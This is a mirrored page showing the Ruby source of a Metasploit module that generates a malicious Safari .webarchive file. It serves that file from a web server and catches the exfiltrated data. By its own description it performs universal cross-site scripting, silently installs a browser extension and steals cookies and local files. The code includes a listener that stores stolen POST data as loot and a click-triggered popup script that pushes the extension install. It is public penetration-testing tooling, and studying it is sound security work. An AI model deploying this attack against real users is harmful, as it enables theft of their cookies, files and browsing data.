Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
require 'uri'
7
8
class MetasploitModule < Msf::Auxiliary
9
include Msf::Exploit::FILEFORMAT
10
include Msf::Exploit::Remote::HttpServer::HTML
11
include Msf::Exploit::Format::Webarchive
12
include Msf::Auxiliary::Report
13
14
def initialize(info = {})
15
super(
16
update_info(
17
info,
18
'Name' => 'Mac OS X Safari .webarchive File Format UXSS',
19
'Description' => %q{
20
Generates a .webarchive file for Mac OS X Safari that will attempt to
21
inject cross-domain Javascript (UXSS), silently install a browser
22
extension, collect user information, steal the cookie database,
23
and steal arbitrary local files.
24
25
When opened on the target machine the webarchive file must not have the
26
quarantine attribute set, as this forces the webarchive to execute in a
27
sandbox.
28
},
29
'License' => MSF_LICENSE,
30
'Author' => 'joev',
31
'References' => [
32
['URL', 'https://www.rapid7.com/blog/post/2013/04/25/abusing-safaris-webarchive-file-format/']
33
],
34
'DisclosureDate' => '2013-02-22',
35
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
36
'PassiveActions' => [ 'WebServer' ],
37
'DefaultAction' => 'WebServer',
38
'Notes' => {
39
'Reliability' => UNKNOWN_RELIABILITY,
40
'Stability' => UNKNOWN_STABILITY,
41
'SideEffects' => UNKNOWN_SIDE_EFFECTS
42
}
43
)
44
)
45
end
46
47
def run
48
if datastore["URIPATH"].blank?
49
datastore["URIPATH"] = "/" + Rex::Text.rand_text_alphanumeric(rand(10) + 6)
50
end
51
52
print_status("Creating '#{datastore['FILENAME']}' file...")
53
file_create(webarchive_xml)
54
exploit
55
end
56
57
def on_request_uri(cli, request)
58
if request.method =~ /post/i
59
data_str = request.body.to_s
60
begin
61
data = JSON::parse(data_str || '')
62
file = record_data(data, cli)
63
send_response_html(cli, '')
64
print_good "#{data_str.length} chars received and stored to #{file}"
65
rescue JSON::ParserError => e # json error, dismiss request & keep crit. server up
66
file = record_data(data_str, cli)
67
print_error "Invalid JSON stored in #{file}"
68
send_response_html(cli, '')
69
end
70
else
71
send_response(cli, webarchive_xml, {
72
'Content-Type' => 'application/x-webarchive',
73
'Content-Disposition' => "attachment; filename=\"#{datastore['FILENAME']}\""
74
})
75
end
76
end
77
78
# @param [Hash] data the data to store in the log
79
# @return [String] filename where we are storing the data
80
def record_data(data, cli)
81
if data.is_a? Hash
82
file = File.basename(data.keys.first).gsub(/[^A-Za-z]/, '')
83
end
84
store_loot(
85
file || "data", "text/plain", cli.peerhost, data, "safari_webarchive", "Webarchive Collected Data"
86
)
87
end
88
89
# @return [String] formatted http/https URL of the listener
90
def backend_url
91
proto = (datastore["SSL"] ? "https" : "http")
92
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
93
port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
94
"#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"
95
end
96
97
def message
98
super + (datastore['INSTALL_EXTENSION'] ? " <a href='javascript:void(0)'>Click here to continue.</a>" + popup_js : '')
99
end
100
101
def popup_js
102
wrap_with_script do
103
%Q|
104
window.onclick = function() {
105
window.open('data:text/html,<script>opener.postMessage("EXT", "*");window.location="#{apple_extension_url}";<\\/script>');
106
};
107
|
108
end
109
end
110
111
end
112
113